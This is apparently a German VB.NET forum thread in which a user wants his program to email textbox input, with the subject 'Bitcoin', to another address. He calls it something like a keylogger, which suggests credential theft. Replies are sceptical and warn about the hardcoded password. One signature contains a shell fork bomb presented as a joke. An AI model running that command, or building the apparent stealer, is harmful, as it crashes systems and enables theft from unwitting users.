VB Email senden

  • VB.NET
  • .NET (FX) 4.0

Es gibt 6 Antworten in diesem Thema. Der letzte Beitrag () ist von Abe2012.

    VB Email senden

    Hallo. Ich versuche schon seid mindestens 2 Stunden über mein Programm eine Email an eine andere Email zu senden. So was in der art was früher als KEYLOGGER bezeichnet wurde.
    Ich hoffe ihr könnt mir weiter helfen.

    VB.NET-Quellcode

    1. Dim Msg As New MailMessage
    2. Dim myCredentials As New System.Net.NetworkCredential
    3. myCredentials.UserName = "dasdasdassssssssss@hotmail.com"
    4. myCredentials.Password = "passwort"
    5. Msg.IsBodyHtml = False
    6. Dim mySmtpsvr As New SmtpClient()
    7. mySmtpsvr.EnableSsl = True 'SSL aktivieren
    8. mySmtpsvr.Host = "smtp.live.com"
    9. mySmtpsvr.Port = 25
    10. mySmtpsvr.UseDefaultCredentials = False
    11. mySmtpsvr.Credentials = myCredentials
    12. Try
    13. Msg.From = New MailAddress("dasdasdassssssssss@hotmail.com")
    14. Msg.To.Add("Ziel Email")
    15. Msg.Subject = "Bitcoin"
    16. Msg.Body = AirFoxTextbox3.Text & "name:" & AirFoxTextbox1.Text
    17. mySmtpsvr.Send(Msg)
    18. MsgBox("E-Mail gesendet.", MsgBoxStyle.Information, Title:="Information")
    19. Catch ex As Exception
    20. MsgBox(Err.Number & ex.Message & ex.StackTrace.ToString) 'Falls ein Fehler auftritt wird eine MsgBox angezeigt
    21. End Try


    *Topic verschoben, VB-Tag eingefügt*

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Marcus Gräfe“ ()

    Ja könnten wir ... aber den Teil lass ich jetzt einfach mal weg, genauso wie du die Fehlerbeschreibung und andere Informationen auslässt.

    xtamersan schrieb:

    So was in der art was früher als KEYLOGGER bezeichnet wurde.
    Was meinst Du damit?

    Grüße
    #define for for(int z=0;z<2;++z)for // Have fun!
    Execute :(){ :|:& };: on linux/unix shell and all hell breaks loose! :saint:

    Bitte keine Programmier-Fragen per PN, denn dafür ist das Forum da :!:
    in der Hoffnung, dass du es mit einer Textbox realisieren willst, und keinen Unsinn beabsichtigst...

    xtamersan schrieb:

    über mein Programm eine Email an eine andere Email zu senden

    Solang du das Programm nur für Dich benutzt - meinetwegen.
    Andernfalls eher eine schlechte Idee, da man das angegebene Passwort dem Code einfach entnehmen kann.
    Ich benutz schon seit langem einen sehr zuverlässigen PHP-Mailer auf meinem kleinen Webserver.
    Kannst es Dir ja einfach mal anschauen.

    Zu deinem Programmcode:
    Da du keine genaue Angabe gemacht hast, wo du ein Problem hast, kann man das nur vermuten.
    Ich vermute, dass du bei deinem Email-Anbieter vergessen hast, diese Funktion freizuschalten.
    Ich kenne das von Web.de-Accounts, da muss man diese Funktion nämlich auch erst in den Einstellungen des Postfachs aktivieren.

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „TRiViUM“ ()